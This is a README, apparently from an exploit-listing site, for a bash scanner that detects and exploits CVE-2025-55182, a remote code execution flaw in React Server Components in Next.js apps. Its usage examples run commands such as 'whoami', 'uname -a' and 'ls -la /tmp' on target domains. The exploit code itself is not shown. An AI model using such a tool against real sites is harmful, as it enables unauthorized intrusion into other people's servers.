Share
## https://sploitus.com/exploit?id=FCC7ECD7-4FC8-56A9-A464-DE87442997C8
# CVE-2025-55182 Scanner
Simple command-line tool for detecting and exploiting CVE-2025-55182 (React Server Components RCE) in Next.js applications.
## Installation
```bash
chmod +x scanner.sh
```
## Usage
```bash
# Scan with default command (id)
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d example.com -c "whoami"
# With full URL
./scanner.sh -d https://example.com -c "uname -a"
```
## Options
- `-d, --domain` - Target domain/URL (required)
- `-c, --command` - Command to execute (default: `id`)
## Examples
```bash
# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com
# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"
# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
```
## Requirements
- Bash
- curl
- openssl
## Disclaimer
This tool is for **educational and authorized security testing purposes only**. Do not use against systems you don't own or have permission to test.
## References
- [CVE-2025-55182](https://cloud.projectdiscovery.io/library/CVE-2025-55182)
- [React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)